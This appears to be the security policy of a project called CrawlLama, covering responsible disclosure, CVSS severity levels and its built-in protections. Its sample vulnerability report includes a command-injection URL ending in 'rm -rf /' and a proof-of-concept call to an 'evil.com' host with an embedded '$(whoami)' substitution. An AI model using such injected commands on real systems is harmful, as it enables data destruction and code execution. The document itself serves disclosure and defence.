| Navigation: README | Contributing | Docs | Changelog |
The security of CrawlLama is important to us. If you discover a vulnerability, please report it responsibly.
| We provide security updates for the following versions: | Version | Supported |
| Version | Supported |
|---|---|
| 1.4.9 | :white_check_mark: |
| 1.3.x | :x: |
| 1.2.x | :x: |
| < 1.2 | :x: |
Do NOT create public GitHub Issues for vulnerabilities. This could put other users at risk.
Please report vulnerabilities responsibly via:
[SECURITY] Short DescriptionPlease provide as many details as possible:
Example:
**Vulnerability:** Command Injection in page_reader.py
**Version:** v1.3.0
**Description:**
The function `fetch_page()` in `tools/page_reader.py` does not properly validate user input, which can lead to command injection.
**Steps:**
1. Start CrawlLama
2. Enter the following URL: `http://example.com; rm -rf /`
3. Command is executed on the system
**Impact:**
Remote Code Execution (RCE) as the user running CrawlLama
**PoC:**
```python
from tools.page_reader import fetch_page
fetch_page("http://evil.com$(whoami)")
Suggestion:
URL validation with validators.url() before processing
We strive for the following response times:
| We use the CVSS v3.1 scoring system: | Severity | CVSS Score | Examples |
|---|---|---|---|
| Critical | 9.0-10.0 | RCE, Authentication Bypass | |
| High | 7.0-8.9 | SQL Injection, XSS | |
| Medium | 4.0-6.9 | CSRF, Information Disclosure | |
| Low | 0.1-3.9 | Minor Information Leaks |
CrawlLama is designed for local operation. All LLM processing (Ollama) happens locally, ensuring data privacy. However, web searches and data fetching inherently require internet access and are not local operations. For enhanced privacy during these operations, we recommend using a VPN or proxy.
If exposed publicly (e.g. via FastAPI):
Important Security Measures:
security.rate_limit)Mitigation:
data/blacklist.txt)Mitigation:
core/hallu_detect.py)We monitor dependencies regularly:
# Check dependencies
pip-audit
safety check
# Or with our script
python scripts/check_dependencies.py
Automatic updates: Dependabot is enabled and creates PRs for security updates.
CrawlLama has the following built-in security features:
# API Key Authentication
X-API-Key: your-secure-api-key-here
# Role-Based Access Control (RBAC)
# - admin: Full access to all endpoints
# - user: Standard access (queries, memory, sessions)
# - read_only: Read-only access (queries only)
# Cross-Site Request Forgery protection
# Required for all state-changing operations (POST/PUT/PATCH/DELETE)
# 1. Get CSRF token
POST /csrf-token
Headers: X-API-Key: your-key
# 2. Use token in subsequent requests
POST /config
Headers:
X-API-Key: your-key
X-CSRF-Token: token-from-step-1
# utils/validators.py
validate_url() # Check URL format
validate_query() # Check query length/content
sanitize_output() # Clean LLM output
validate_url_ssrf_safe() # SSRF protection with DNS rebinding detection
# Distributed rate limiting with Redis
# Falls back to in-memory if Redis unavailable
# Per-user, per-endpoint limits
# Default: 60 requests/minute
# Configurable via RATE_LIMIT environment variable
# Enhanced session security
# - Session timeout (24 hours default)
# - IP address tracking
# - Last activity tracking
# - Session refresh capability
POST /session/refresh # Extend session expiration
# Comprehensive security event logging
# - All API requests logged
# - Authentication/authorization events
# - Configuration changes
# - Security events (CSRF, rate limits)
# Query audit logs (admin only):
GET /admin/audit/logs?event_type=authentication&status=failure
# Graceful key rotation with zero downtime
# Multiple active keys per user
# Generate new key:
POST /admin/api-keys/generate
# Rotate existing key:
POST /admin/api-keys/rotate
# List your keys:
GET /admin/api-keys/list
# Revoke old key:
DELETE /admin/api-keys/revoke/{key_id}
# data/blacklist.txt
# Blocks known malicious domains
malware-site.com
phishing-domain.net
# API keys are stored encrypted
from utils.secure_config import SecureConfig
config = SecureConfig()
config.set_key("api_key", "secret") # Encrypted
# Plugins run in a separate namespace
# No access to sensitive data
# Path traversal protection
All responses include comprehensive security headers:
Content-Security-Policy: Strict CSP to prevent XSSX-Content-Type-Options: nosniff: Prevent MIME sniffingX-Frame-Options: DENY: Prevent clickjackingX-XSS-Protection: 1; mode=block: Legacy XSS protectionStrict-Transport-Security: Force HTTPS (when using HTTPS)Referrer-Policy: strict-origin-when-cross-origin: Control referrer leakageCSRF protection includes Origin and Referer header validation for all state-changing requests.
Automatic security configuration validation on startup:
.env for API keys # .env
CRAWLLAMA_API_KEY=your-strong-api-key-min-32-chars
ALLOWED_HOSTS=yourdomain.com,www.yourdomain.com
ALLOWED_ORIGINS=https://yourdomain.com,https://www.yourdomain.com
RATE_LIMIT_SECRET=your-secret-for-rate-limiting
REDIS_URL=redis://localhost:6379/0 # For distributed deployments
/admin/audit/logs regularly for suspicious activityvalidators.py for all inputs.envpip-audit before every releaseDepends(verify_csrf_token) to state-changing endpointsDepends(verify_role(Role.ADMIN)) for admin-only endpointsaudit_logger for security-relevant actionsSECURITY_STRICT_MODE=true to block on security issuespip-audit shows no critical/high vulnerabilities.env.example contains only placeholdersAfter fixing a vulnerability:
We thank the following security researchers for responsible disclosure:
No reports yet - be the first!
Currently, we have no official bug bounty program.
However, we honor all security reports with:
Thank you for helping keep CrawlLama secure!